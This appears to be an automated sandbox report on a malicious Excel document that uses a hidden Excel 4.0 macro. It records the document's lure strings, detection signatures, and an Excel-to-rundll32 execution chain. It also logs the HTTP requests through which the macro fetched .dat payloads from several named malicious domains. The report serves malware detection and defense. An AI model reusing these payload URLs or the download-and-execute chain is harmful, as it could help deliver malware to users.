Loading ...

Play interactive tourEdit tour

Analysis Report Complaint-447781983-02182021.xls

Overview

General Information

Sample Name:Complaint-447781983-02182021.xls
Analysis ID:356654
MD5:60f845a847e771a59b97d456c494f69d
SHA1:bf79e4535e5d15cfbd4c6eb2fa2d086703ad81d6
SHA256:c44df560766b2a3f60adba4ef6448e266a3036e19fc1631ae9ada22628447319
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 7104 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 6624 cmdline: rundll32 ..\JDFR.hdfgr,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4552 cmdline: rundll32 ..\JDFR.hdfgr1,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5940 cmdline: rundll32 ..\JDFR.hdfgr2,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6808 cmdline: rundll32 ..\JDFR.hdfgr3,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6880 cmdline: rundll32 ..\JDFR.hdfgr4,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Complaint-447781983-02182021.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0xadf2:$e1: Enable Editing
  • 0xae3c:$e1: Enable Editing
  • 0x158cc:$e1: Enable Editing
  • 0x15916:$e1: Enable Editing
  • 0x20083:$e1: Enable Editing
  • 0x200cd:$e1: Enable Editing
  • 0xae5a:$e2: Enable Content
  • 0x15934:$e2: Enable Content
  • 0x200eb:$e2: Enable Content
Complaint-447781983-02182021.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\JDFR.hdfgr,DllRegisterServer, CommandLine: rundll32 ..\JDFR.hdfgr,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 7104, ProcessCommandLine: rundll32 ..\JDFR.hdfgr,DllRegisterServer, ProcessId: 6624

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Antivirus detection for URL or domainShow sources
    Source: http://pathinanchilearthmovers.com/eznwcdhx/44250601302777800000.datAvira URL Cloud: Label: malware
    Multi AV Scanner detection for domain / URLShow sources
    Source: pathinanchilearthmovers.comVirustotal: Detection: 8%Perma Link
    Multi AV Scanner detection for submitted fileShow sources
    Source: Complaint-447781983-02182021.xlsVirustotal: Detection: 31%Perma Link

    Compliance:

    barindex
    Uses new MSVCR DllsShow sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Uses secure TLS version for HTTPS connectionsShow sources
    Source: unknownHTTPS traffic detected: 138.36.237.100:443 -> 192.168.2.4:49737 version: TLS 1.2

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exeJump to behavior
    Source: global trafficDNS query: name: rzminc.com
    Source: global trafficTCP traffic: 192.168.2.4:49737 -> 138.36.237.100:443
    Source: global trafficTCP traffic: 192.168.2.4:49730 -> 72.52.227.180:80
    Source: Joe Sandbox ViewIP Address: 138.36.237.100 138.36.237.100
    Source: Joe Sandbox ViewIP Address: 91.199.212.52 91.199.212.52
    Source: Joe Sandbox ViewIP Address: 91.199.212.52 91.199.212.52
    Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: global trafficHTTP traffic detected: GET /xklyulyijvn/44250601302777800000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rzminc.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /eznwcdhx/44250601302777800000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pathinanchilearthmovers.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /xjzpfwc/44250601302777800000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: jugueterialatorre.com.arConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /fdzgprclatqo/44250601302777800000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rzminc.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /xklyulyijvn/44250601302777800000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rzminc.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /eznwcdhx/44250601302777800000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pathinanchilearthmovers.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /xjzpfwc/44250601302777800000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: jugueterialatorre.com.arConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /SectigoRSADomainValidationSecureServerCA.crt HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Microsoft-CryptoAPI/10.0Host: crt.sectigo.com
    Source: global trafficHTTP traffic detected: GET /fdzgprclatqo/44250601302777800000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rzminc.comConnection: Keep-Alive
    Source: unknownDNS traffic detected: queries for: rzminc.com
    Source: 30D802E0E248FEE17AAF4A62594CC75A.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://api.aadrm.com/
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://api.cortana.ai
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://api.office.net
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://api.onedrive.com
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://augloop.office.com
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://cdn.entity.
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://clients.config.office.net/
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://config.edge.skype.com
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://cortana.ai
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://cortana.ai/api
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://cr.office.com
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://dev.cortana.ai
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://devnull.onenote.com
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://directory.services.
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://graph.windows.net
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://graph.windows.net/
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://lifecycle.office.com
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://login.windows.local
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://management.azure.com
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://management.azure.com/
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://messaging.office.com/
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://ncus-000.contentsync.
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://officeapps.live.com
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://onedrive.live.com
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://outlook.office.com/
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://outlook.office365.com/
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://settings.outlook.com
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://staging.cortana.ai
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://tasks.office.com
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
